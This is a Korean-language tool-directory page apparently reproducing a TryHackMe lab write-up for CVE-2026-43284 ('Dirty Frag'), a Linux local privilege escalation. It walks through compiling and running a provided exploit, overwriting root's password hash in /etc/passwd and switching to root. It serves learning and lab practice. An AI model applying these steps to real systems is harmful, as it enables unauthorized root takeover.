Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-43284---DirtyFrag-Analysis-THM- — TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup | Kitploit
도구/GitHubGitHub/revyhub/cve-2026-43284---dirtyfrag-analysis-thm-
Privilege EscalationVulnerability AnalysisExploitationCTFLearning & EducationLabs & Practice
GitHubrevyhub/cve-2026-43284---dirtyfrag-analysis-thm-

CVE-2026-43284---DirtyFrag-Analysis-THM-

TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
118일 전아직 검토되지 않음

TryHackMe — CVE-2026-43284: Dirty Frag

룸: CVE-2026-43284: Dirty Frag 분류: Linux 권한 상승 작성자: (내 페이지)

개요

Dirty Frag는 CVE-2026-43284를 기반으로 구축된 연쇄적인 Linux 로컬 권한 상승(LPE) 룸입니다. 목표는 제공된 개념 증명 익스플로잇을 이용하여 권한 없는 셸에서 root로 전환하는 것입니다.

초기 열거

작업 디렉터리를 나열하면 익스플로잇에 제공된 파일들이 표시됩니다:

root@kitploit:~
$ ls
README.txt
exp
exp.c
  • exp.c — 익스플로잇 소스 코드
  • exp — 사전 컴파일된 바이너리 (대상 환경과 일치하지 않을 수 있음)
  • README.txt — 익스플로잇과 함께 제공되는 사용 지침

익스플로잇 빌드

제공된 exp 바이너리가 대상의 정확한 환경과 호환되지 않을 수 있으므로, 소스에서 다시 빌드하는 것이 더 안전합니다:

root@kitploit:~
$ gcc -O0 -Wall -o exp exp.c -lutil
  • -O0 — 컴파일러 최적화를 비활성화하여 동작을 예측 가능하게 유지하고 소스와 일치시킵니다
  • -Wall — 컴파일러 경고를 활성화하여 빌드의 정상 여부를 확인하는 데 유용합니다
  • -lutil — libutil을 링크합니다. 코드가 의사 터미널(pty) 함수를 사용할 때 일반적으로 필요합니다

취약점 트리거

root@kitploit:~
$ ./exp

컴파일된 익스플로잇을 실행하면 기본 결함이 트리거되어, 일반적으로 권한 없는 사용자에게 읽기 전용이어야 하는 파일 — 이 경우 /etc/passwd — 에 쓰기 액세스 권한이 생깁니다.

Root로 권한 상승

쓰기 액세스 권한을 얻은 후 root에 대한 새 비밀번호 해시가 생성됩니다:

root@kitploit:~
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..

이 해시는 /etc/passwd에서 root의 기존 해시 필드 자리에 작성됩니다:

root@kitploit:~
$ nano /etc/passwd

이제 root의 비밀번호를 알았으므로 사용자 전환은 간단합니다:

root@kitploit:~
$ su root

플래그 획득

root@kitploit:~
$ cat /root/flag.txt
THM{REDACTED}

교훈

  • (이것은 처음 이해하는 데 30분 이상 걸렸지만, 한번 이해한 후에는 동일한 익스플로잇을 여러 번 반복해서 실행할 수 있었습니다.)
  • (내부 루트 코드는 이상합니다. 기본 컨트롤을 선택하여 사용할 수 없으므로, 화살표 키를 사용하여 root❌로 이동한 다음 X를 생성한 해시로 변경해야 합니다.)

완화 조치

  • 커널/시스템 패키지를 패치하고 최신 상태로 유지하십시오

이 글은 교육 목적으로 완료된 TryHackMe 룸을 문서화한 것입니다. 대상 환경은 TryHackMe가 제공하는 의도적으로 취약한 머신입니다.

도구 다운로드